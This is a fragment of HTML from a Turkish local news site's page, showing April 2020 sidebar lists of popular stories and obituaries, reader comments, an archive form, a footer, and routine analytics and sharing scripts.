src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistanli_guvenlik_gorevlisi_paylasimi_ile_gonulleri_fethetti_h66270_993f6.jpg" alt="Elbistanlı güvenlik görevlisi, paylaşımı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-guvenlik-gorevlisi-paylasimi-ile-gonulleri-fethetti-h66270.html" title="" ><span class="en-hit">1.</span> <strong>Elbistanlı güvenlik görevlisi, paylaşımı...</strong> <span class="en-spot en-hidden">Antalya’nın Serik ilçesine bağlı Belek Turizm Merkezi’ndeki bir...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-kari-koca-koronavirusten-kurtulamadi-h66275.html" title="Elbistanlı karı koca, koronavirüsten..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/elbistanli_kari_koca_koronavirusten_kurtulamadi_h66275_89159.jpg" alt="Elbistanlı karı koca, koronavirüsten..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-kari-koca-koronavirusten-kurtulamadi-h66275.html" title="" ><span class="en-hit">2.</span> <strong>Elbistanlı karı koca, koronavirüsten...</strong> <span class="en-spot en-hidden">Fransa’da yaşayan Elbistanlı Zeynep ve Hasan Deli çiftçi, yakalandıkları...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-sokaga-cikma-yasaginin-kapsami-genisletildi-h66212.html" title="Elbistanda sokağa çıkma yasağının..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistanda_sokaga_cikma_yasaginin_kapsami_genisletildi_h66212_8331f.jpg" alt="Elbistanda sokağa çıkma yasağının..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-sokaga-cikma-yasaginin-kapsami-genisletildi-h66212.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan’da sokağa çıkma yasağının...</strong> <span class="en-spot en-hidden">Kahramanmaraş İl Umumi Hıfzıssıhha Meclisi, çocukların, bebeklerin,...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan#039;a şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistan_a_sehit_atesi_dustu_h66085_82669.jpg" alt="Elbistan#039;a şehit ateşi düştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan&#039;a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Elbistan&#039;a şehit ateşi düştü</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/umre-donusu-rahatsizlandi-koronavirus-suphesi-ile-gozlem-altina-alindi-h65992.html" title="Umre dönüşü rahatsızlandı, koronavirüs..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/umre_donusu_rahatsizlandi_korona_virus_suphesi_ile_gozlem_altina_alindi_h65992_f29fe.jpg" alt="Umre dönüşü rahatsızlandı, koronavirüs..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/umre-donusu-rahatsizlandi-koronavirus-suphesi-ile-gozlem-altina-alindi-h65992.html" title="" ><span class="en-hit">5.</span> <strong>Umre dönüşü rahatsızlandı, koronavirüs...</strong> <span class="en-spot en-hidden">Elbistan’da yüksek ateş şikayeti ile hastaneye başvuran 70 yaşındaki...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/tahsin-seran-68-yasinda-h66296.html" title="Tahsin şeran 68 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/tahsin_seran_68_yasinda_h66296_3c97a.jpg" alt="Tahsin şeran 68 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/tahsin-seran-68-yasinda-h66296.html" title="" ><span class="en-hit">1.</span> <strong>Tahsin şeran 68 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/zahide-keser-89-yasinda-h66169.html" title="Zahide Keser 89 Yaşında ;" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/zahide_keser_89_yasinda_h66169_5e3bd.jpg" alt="Zahide Keser 89 Yaşında ;"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/zahide-keser-89-yasinda-h66169.html" title="" ><span class="en-hit">2.</span> <strong>Zahide Keser 89 Yaşında ;</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="Elbistan#039;a şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/elbistan_a_sehit_atesi_dustu_h66085_82669.jpg" alt="Elbistan#039;a şehit ateşi düştü"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-a-sehit-atesi-dustu-h66085.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan&#039;a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Elbistan&#039;a şehit ateşi düştü</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/gunay-bozkus-54-yasinda-h66257.html" title="Günay Bozkuş 54 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/04/gunay_bozkus_54_yasinda_h66257_fe39e.jpg" alt="Günay Bozkuş 54 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/gunay-bozkus-54-yasinda-h66257.html" title="" ><span class="en-hit">4.</span> <strong>Günay Bozkuş 54 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-topsakal-87-yasinda-h66018.html" title="Hatice Topsakal 87 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/03/hatice_topsakal_87_yasinda_h66018_6bc96.jpg" alt="Hatice Topsakal 87 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hatice-topsakal-87-yasinda-h66018.html" title="" ><span class="en-hit">5.</span> <strong>Hatice Topsakal 87 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanda-sokaga-cikma-yasaginin-kapsami-genisletildi-h66212.html#comment_296313" title="" >Disari cikma yasagina uyalim.calisan arkadaslarin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlut-isik-h66327.html#comment_296312" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html#comment_296311" title="" >Ooo maşAllah sanki savas cikti devlet sosyal...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/nimet-eser-71-yasinda-h66317.html#comment_296309" title="" >ALLAH+rahmet+eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html#comment_296308" title="" >Allah ım Ülkemizin Birliği&#39;ni Dirligini...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/canli-muhre-ile-keklik-avi-cezasiz-kalmadi-h66320.html#comment_296307" title="" >Nurhak bölgesinde de her evde bu av kekliklerinden...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/muzaffer-binboga-55-yasinda-h66309.html#comment_296304" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/idris-oz-60-yasinda-h66308.html#comment_296303" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/yasar-cek-80-yasinda-h66310.html#comment_296302" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/nimet-eser-71-yasinda-h66317.html#comment_296301" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ali-ucuk-65-yasinda-h66322.html#comment_296300" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlut-isik-h66327.html#comment_296299" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-ciftcilere-destek-h66303.html#comment_296298" title="" >Turk milleti icin devleti icin calisandan...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-kavgaya-karisan-7-kisiye-sosyal-mesafe-cezasi-h66305.html#comment_296297" title="" >Ucretsiz maske icin mi kavga etmisler :)</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/turkiyeye-ornek-olacak-izolasyon-merkezi-projesi-hayata-geciyor-h66316.html#comment_296296" title="" >Virus Canliya bulasiyor Su kaynagi tehlike...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-guvenlik-gorevlisi-paylasimi-ile-gonulleri-fethetti-h66270.html#comment_296295" title="" >Helal sana toprağım ağzına yüreğine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yasak-basladi-uymayana-3-bin-180-tl-ceza-kesilecek-h66330.html#comment_296292" title="" >Bence çok az bu ceza 5bin yazacaksın bak...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/tahsin-yildirim-58-yasinda-h18857.html#comment_296291" title="" >Bu gün öğrendim. çok üzüldüm. yıllardır...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/mevlut-isik-h66327.html#comment_296290" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-genelinde-hafta-sonu-icin-sokaga-cikma-yasagi-ilan-edildi-h66328.html#comment_296289" title="" >Zaten önlemler alınıyor bunlar bizim...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" selected>11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" selected>Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Elbistan Belediyesi ekipleri ekmek dağıtımı için sahada" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> elbistaninsesigazetesi@gmail.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Felbistan-belediyesi-ekipleri-ekmek-dagitimi-icin-sahada-h66336.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('66336', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 